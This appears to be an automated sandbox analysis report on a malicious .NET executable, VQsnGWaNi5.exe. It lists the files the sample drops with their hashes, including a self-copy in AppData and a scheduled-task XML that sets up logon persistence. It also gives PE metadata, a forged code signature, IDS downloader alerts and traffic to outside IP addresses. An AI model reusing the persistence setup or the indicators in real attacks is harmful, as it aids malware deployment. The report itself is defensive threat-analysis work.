Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ywKvCTGbQjXP.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:	97AD91F1C1F572C945DA12233082171D
SHA1:	D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:	8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380134126512796
Encrypted:	false
SSDEEP:	48:+WSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyufF:+LHxvIIwLgZ2KRHWLOugbfF
MD5:	D275C762065AFE9DE7A29BFC526E6D0D
SHA1:	431F7D67F91AE5218C3B6AAF614A27444F1B10E7
SHA-256:	AF6027BBD99BE81610FD2197EE3AFC9634068C593907D8348129229B8918E9E2
SHA-512:	E27A3F76F74D73BBA53691CD9BC3CEC640B73640442ACBED6D4021672DE4549F209D9F653F02F153EFB8F03B74A91AF7AA1EB495D0793098918831410B8B2F45
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qudpziu.2b3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1t3cykk.f4o.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyssz4ha.cm4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1gdtdkr.1yv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nexmvblu.fpo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tn42k5yh.x05.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfjkelc4.tdx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zh4fzbaa.xv1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpD53.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.126236683519346
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAaxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTjuv
MD5:	E4BA8CA035288676AADCA2469D35BF0C
SHA1:	61A00953A0F804025A59632186BFA1FB369D97D1
SHA-256:	E98F5C042456B619ED66FC794B07AC7DEAFF4F2AE18E4BED510F50822D91DA43
SHA-512:	13DD7488DBB43032480C457B5D4BB925E5320C3E26173346AB17D3B3C9D73F534DAFE4EB9318DFDC9B0E7497DB91FC20B842DAA7A70A5223E9C16695A0CD6374
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpEED9.tmp

Download File

Process:	C:\Users\user\Desktop\VQsnGWaNi5.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.126236683519346
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAaxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTjuv
MD5:	E4BA8CA035288676AADCA2469D35BF0C
SHA1:	61A00953A0F804025A59632186BFA1FB369D97D1
SHA-256:	E98F5C042456B619ED66FC794B07AC7DEAFF4F2AE18E4BED510F50822D91DA43
SHA-512:	13DD7488DBB43032480C457B5D4BB925E5320C3E26173346AB17D3B3C9D73F534DAFE4EB9318DFDC9B0E7497DB91FC20B842DAA7A70A5223E9C16695A0CD6374
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Download File

Process:	C:\Users\user\Desktop\VQsnGWaNi5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	830984
Entropy (8bit):	7.051627195909479
Encrypted:	false
SSDEEP:	12288:/wMiwy9EXX+Rdw0kIQa+eeAoAwnPrGcthicFkgR74u8K8j0AH0+L5iTkR:MwFOlTQateDH7KI7Ba0e5iG
MD5:	22A9330757374B6B15F04E37C4ACE8E6
SHA1:	021E607EFAD2B2E256C4B3E6E1AD03BCB534A1FE
SHA-256:	DDFBC9803252F22C7A06D2E1A1FD8617F3E5313CD0493809839AA6907291E7C7
SHA-512:	6B78603C3B6F600C2F923BC08474E12537945928383901677CA380CE3B3BEBA3B3D29A67004D36599619D7C7413291B36836DC3952709E7C2DA8241650310A87
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.N...............0.............j.... ... ....@.. ....................................@.....................................O.... ...............x...6..............p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc...............v..............@..B................K.......H............h......f...lA................................................r...ps....}.....s....}......}.....(.......(......(........0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!......0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....

C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\VQsnGWaNi5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.051627195909479
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	VQsnGWaNi5.exe
File size:	830'984 bytes
MD5:	22a9330757374b6b15f04e37c4ace8e6
SHA1:	021e607efad2b2e256c4b3e6e1ad03bcb534a1fe
SHA256:	ddfbc9803252f22c7a06d2e1a1fd8617f3e5313cd0493809839aa6907291e7c7
SHA512:	6b78603c3b6f600c2f923bc08474e12537945928383901677ca380ce3b3beba3b3d29a67004d36599619d7c7413291b36836dc3952709e7c2da8241650310a87
SSDEEP:	12288:/wMiwy9EXX+Rdw0kIQa+eeAoAwnPrGcthicFkgR74u8K8j0AH0+L5iTkR:MwFOlTQateDH7KI7Ba0e5iG
TLSH:	F005BE14366DCA06C52447B00AADE67B83F97D4AA9A1F20A2DD57EDF3C71B341E106B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.N...............0.............j.... ... ....@.. ....................................@................................

File Icon


Icon Hash:	8c2c6c9a82da80d2

Static PE Info

General

Entrypoint:	0x4b006a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE94E0121 [Wed Jan 13 06:43:45 2094 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FA5147454D2h
je 00007FA5147454D2h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007FA5147454D2h
imul eax, dword ptr [eax], 00610076h
je 00007FA5147454D2h
outsd
add byte ptr [edx+00h], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb0017	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x1909c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc7800	0x3608	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xcc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xada1c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xae090	0xae200	279d6cb6e5dd46f0265f72fe477081cb	False	0.7989921706748025	data	7.496560990644054	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x1909c	0x19200	1ccd927d41342194ce1e90aed901bb62	False	0.038187966417910446	data	1.7651790038028556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xcc000	0xc	0x200	e3f8d23fcec73185c6bb6a8bd70e3320	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb2220	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	0.14450354609929078
RT_ICON	0xb2688	0x3ee	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	0.8001988071570576
RT_ICON	0xb2a78	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	0.04180497925311203
RT_ICON	0xb5020	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	0.06824577861163227
RT_ICON	0xb60c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	0.012894830237785402
RT_ICON	0xc68f0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	0.029581955597543695
RT_GROUP_ICON	0xcab18	0x5a	data	0.7333333333333333
RT_VERSION	0xcab74	0x33c	data	0.4323671497584541
RT_MANIFEST	0xcaeb0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T22:32:38.643587+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49735	193.122.130.0	80	TCP
2025-01-10T22:32:40.346722+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49735	193.122.130.0	80	TCP
2025-01-10T22:32:40.839589+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49739	104.21.48.1	443	TCP
2025-01-10T22:32:41.522240+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49741	193.122.130.0	80	TCP
2025-01-10T22:32:42.124735+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-10T22:32:43.940649+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-10T22:32:44.417507+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49746	104.21.48.1	443	TCP
2025-01-10T22:32:45.018608+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49748	193.122.130.0	80	TCP
2025-01-10T22:32:45.134334+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49749	104.21.48.1	443	TCP
2025-01-10T22:32:47.729870+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49760	104.21.48.1	443	TCP
2025-01-10T22:32:49.940031+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49770	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:32:35.537986994 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:35.542846918 CET	80	49735	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:35.542915106 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:35.543117046 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:35.548042059 CET	80	49735	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:37.124793053 CET	80	49735	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:37.165963888 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:37.170826912 CET	80	49735	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:38.535542011 CET	80	49735	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:38.643587112 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:38.923537016 CET	49737	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:38.923599958 CET	443	49737	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:38.923680067 CET	49737	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:38.981162071 CET	49737	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:38.981198072 CET	443	49737	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:39.462660074 CET	443	49737	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:39.462750912 CET	49737	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:39.468210936 CET	49737	443	192.168.2.4	104.21.48.1
